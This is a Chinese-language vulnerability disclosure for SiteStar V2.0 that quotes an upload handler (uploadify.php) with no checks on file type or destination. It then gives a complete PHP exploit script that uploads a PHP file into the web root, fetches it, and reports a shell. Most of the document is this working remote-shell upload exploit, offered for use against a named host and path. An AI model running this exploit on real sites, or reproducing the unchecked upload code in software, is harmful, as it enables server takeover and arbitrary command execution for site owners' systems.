漏洞程序:建站之星(SiteStar)
漏洞作者:cnryan
SiteStar V2.0没有正确限制文件的上传,远程攻击者可能利用此漏洞上传任意文件到Web目录,最终导致在服务器上执行任意命令。
漏洞产生在 /script/multiupload/uploadify.php文件:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 | <?php if (!empty($_FILES)) { $tempFile = $_FILES['Filedata']['tmp_name']; $targetPath = $_SERVER['DOCUMENT_ROOT'] . $_POST['folder'] . '/'; $targetFile = str_replace('//','/',$targetPath) . $_FILES['Filedata']['name']; // 解决Windows中文文件名乱码 if (preg_match("/^WIN/i", PHP_OS)) { $targetFile = iconv('UTF-8', 'GBK', $targetFile); } move_uploaded_file($tempFile, $targetFile); echo "1"; } ?> 没什么好说的,低级失误。通过构造html表单可直接上传webshell至web目录,下面提供一段测试代码。EXP: <? print_r(' +---------------------------------------------------------------------------+ SiteStar V2.0 Remote Shell Upload Exploit +---------------------------------------------------------------------------+ '); if ($argc < 3) { print " Usage: php $argv[0] host path "; print "Example: php $argv[0] localhost /sitestar/ "; die(); } error_reporting(0); set_time_limit(0); $host = $argv[1]; $path = $argv[2]; $shell = 'http://'.$host.$path.'cnryan.php'; $payload = "-----cnryan "; $payload .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"cnryan.php\" "; $payload .= "Content-Type: application/octet-stream "; $payload .= "<?php phpinfo();?>W.S.T -----cnryan "; $payload .= "Content-Disposition: form-data; name=\"upload\" "; $payload .= "-----cnryan "; $payload .= "Content-Disposition: form-data; name=\"folder\" "; $payload .= "$path "; $payload .= "-----cnryan--"; $packet = "POST {$path}/script/multiupload/uploadify.php HTTP/1.0 "; $packet .= "Host: {$host} "; $packet .= "Connection: keep-alive "; $packet .= "Content-Type: multipart/form-data; boundary=---cnryan "; $packet .= "Content-Length: ".strlen($payload)." "; $packet .= $payload; $fp = fsockopen($host, 80); fputs($fp, $packet); sleep(5); $str=file_get_contents($shell); if(strpos($str,'W.S.T')) exit("OK! Got shell:\t$shell "); else exit("Exploit Failed! "); ?> |
会员登录关闭
注册会员关闭